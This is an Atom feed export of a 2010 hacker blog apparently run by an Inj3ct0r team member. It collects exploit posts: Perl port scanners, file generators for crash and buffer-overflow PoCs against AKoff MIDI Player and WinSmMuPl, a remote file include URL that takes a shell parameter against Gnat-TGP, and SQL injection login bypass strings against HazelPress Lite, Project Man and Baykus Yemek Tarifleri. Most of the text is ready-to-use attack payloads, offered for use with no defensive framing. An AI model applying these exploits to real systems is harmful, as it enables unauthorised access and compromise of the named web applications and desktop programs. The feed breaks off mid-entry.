<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6120352052168366080</id><updated>2011-07-30T23:42:21.041-07:00</updated><title type='text'>r00t cr4wl3r</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>70</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8150925323116635174</id><published>2010-03-05T06:27:00.002-08:00</published><updated>2010-03-05T06:28:01.488-08:00</updated><title type='text'>Simple Open Port Scanner 2</title><content type='html'>#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;# Simple Open Port Scanner 2&lt;br /&gt;&lt;br /&gt;# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;use IO::Socket;&lt;br /&gt;&lt;br /&gt;if(@ARGV != 3){&lt;br /&gt; print "cr4wl3r\' ports scanner\nUsage: $0 [min port] [max port] [host]\n";&lt;br /&gt; exit 1;&lt;br /&gt;}&lt;br /&gt;if($ARGV[0] &gt; $ARGV[1]){&lt;br /&gt; print "Error: min port is higher then max port\n";&lt;br /&gt; exit 1;&lt;br /&gt;}&lt;br /&gt;for($i = $ARGV[0]; $i &lt;= $ARGV[1]; ++$i){&lt;br /&gt; $host = IO::Socket::INET-&gt;new(PeerAddr=&gt;$ARGV[2],PeerPort=&gt;$i,proto=&gt;'tcp',Timeout=&gt;1) and print "Port $i is open\n";&lt;br /&gt;}&lt;br /&gt;exit;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8150925323116635174?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8150925323116635174/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/simple-open-port-scanner-2.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8150925323116635174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8150925323116635174'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/simple-open-port-scanner-2.html' title='Simple Open Port Scanner 2'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4695109041257616385</id><published>2010-03-05T06:27:00.001-08:00</published><updated>2010-03-05T06:27:38.000-08:00</updated><title type='text'>Simple Open Port Scanner</title><content type='html'>#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;# Simple Open Port Scanner&lt;br /&gt;&lt;br /&gt;# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;# Usage: port.pl [host]&lt;br /&gt;&lt;br /&gt;use IO::Socket;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;for($i = 0; $i &lt;= 65535; ++$i){&lt;br /&gt;$host = IO::Socket::INET-&gt;new(PeerAddr=&gt;$ARGV[0],PeerPort=&gt;$i,proto=&gt;'tcp',Timeout=&gt;1)&lt;br /&gt;and print "&lt;-&gt; Port $i Open\n";&lt;br /&gt;}&lt;br /&gt;exit;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4695109041257616385?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4695109041257616385/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/simple-open-port-scanner.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4695109041257616385'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4695109041257616385'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/simple-open-port-scanner.html' title='Simple Open Port Scanner'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8202213356590287199</id><published>2010-03-04T10:29:00.004-08:00</published><updated>2010-03-04T10:30:19.854-08:00</updated><title type='text'>AKoff MIDI Player 1.00 Buffer Overflow Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";&lt;br /&gt;###################################################################&lt;br /&gt;open(file, "&gt; sploit.mid");&lt;br /&gt;print (file $buff);&lt;br /&gt;###################################################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8202213356590287199?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8202213356590287199/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/akoff-midi-player-100-buffer-overflow.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8202213356590287199'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8202213356590287199'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/akoff-midi-player-100-buffer-overflow.html' title='AKoff MIDI Player 1.00 Buffer Overflow Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8420825285302493973</id><published>2010-03-04T10:29:00.003-08:00</published><updated>2010-03-04T10:29:46.435-08:00</updated><title type='text'>WinSmMuPl 1.2.5 (.mp3) Local Crash PoC</title><content type='html'>#!/usr/bin/perl&lt;br /&gt; &lt;br /&gt;# WinSmMuPl 1.2.5 (.mp3) Local Crash PoC&lt;br /&gt; &lt;br /&gt;# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt; &lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;print "#####################################################\n";&lt;br /&gt;print "[!] WinSmMuPl 1.2.5 (.mp3) Local Crash PoC\n";&lt;br /&gt;print "\n";&lt;br /&gt;print "[!] By: cr4wl3r\n";&lt;br /&gt;print "#####################################################\n";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $boom = "A" x 1337;&lt;br /&gt;my $filename = "sploit.mp3";&lt;br /&gt;open (FILE,"&gt;$filename");&lt;br /&gt;print FILE "$boom";&lt;br /&gt;print "\nDone!\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8420825285302493973?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8420825285302493973/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/winsmmupl-125-mp3-local-crash-poc.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8420825285302493973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8420825285302493973'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/winsmmupl-125-mp3-local-crash-poc.html' title='WinSmMuPl 1.2.5 (.mp3) Local Crash PoC'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-1529633512041698744</id><published>2010-03-04T10:29:00.001-08:00</published><updated>2010-03-04T10:29:21.945-08:00</updated><title type='text'>Gnat-TGP &lt;= 1.2.20 Remote File Include Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;PoC: http://server/includes/tgpinc.php?DOCUMENT_ROOT=[Shell]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-1529633512041698744?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/1529633512041698744/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/gnat-tgp-1220-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1529633512041698744'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/1529633512041698744'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/gnat-tgp-1220-remote-file-include.html' title='Gnat-TGP &lt;= 1.2.20 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-6928958631357293590</id><published>2010-03-04T10:28:00.003-08:00</published><updated>2010-03-04T10:28:58.042-08:00</updated><title type='text'>HazelPress Lite &lt;= 0.0.4 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;# PoC: [path]/login.php&lt;br /&gt; &lt;br /&gt;# Username: ' or '1=1&lt;br /&gt;# password: ' or '1=1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6928958631357293590?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/6928958631357293590/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/hazelpress-lite-004-auth-bypass-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6928958631357293590'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6928958631357293590'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/hazelpress-lite-004-auth-bypass-sql.html' title='HazelPress Lite &lt;= 0.0.4 (Auth Bypass) SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-8095476248994982157</id><published>2010-03-04T10:28:00.001-08:00</published><updated>2010-03-04T10:28:34.759-08:00</updated><title type='text'>Baykus Yemek Tarifleri &lt;= 2.1 SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;# Code:&lt;br /&gt; &lt;br /&gt;include("ayar.php");&lt;br /&gt; &lt;br /&gt;$ids= $_GET["id"];&lt;br /&gt; &lt;br /&gt;$yaz= mysql_fetch_array(mysql_query("select * from tarifler where id='$ids'"));&lt;br /&gt; &lt;br /&gt;mysql_select_db("yemek");&lt;br /&gt;    &lt;br /&gt;    mysql_query("SET NAMES ?latin5?");&lt;br /&gt;    mysql_query("SET CHARACTER SET latin5"); &lt;br /&gt; &lt;br /&gt; &lt;br /&gt;$baslik= $yaz["baslik"];&lt;br /&gt;    $resim          = $yaz['resim'];&lt;br /&gt;    if($resim==""){&lt;br /&gt;    $resim= "bos.png";&lt;br /&gt;    }&lt;br /&gt;$kisa= $yaz["kisa"];&lt;br /&gt;$tarif= $yaz["metin"];&lt;br /&gt;############################################################&lt;br /&gt;# PoC: [path]/oku.php?id=[SQL]&lt;br /&gt;############################################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-8095476248994982157?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/8095476248994982157/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/baykus-yemek-tarifleri-21-sql-injection.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8095476248994982157'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/8095476248994982157'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/baykus-yemek-tarifleri-21-sql-injection.html' title='Baykus Yemek Tarifleri &lt;= 2.1 SQL Injection Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4763439324698237607</id><published>2010-03-04T10:27:00.002-08:00</published><updated>2010-03-04T10:28:11.996-08:00</updated><title type='text'>Project Man &lt;= 1.0 (Auth Bypass) SQL Injection Vulnerability</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;PoC:&lt;br /&gt; [Project Man_path]/login.php&lt;br /&gt; &lt;br /&gt;Username: ' or '1=1&lt;br /&gt;password: ' or '1=1&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4763439324698237607?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4763439324698237607/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/project-man-10-auth-bypass-sql.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4763439324698237607'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4763439324698237607'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/project-man-10-auth-bypass-sql.html' title='Project Man &lt;= 1.0 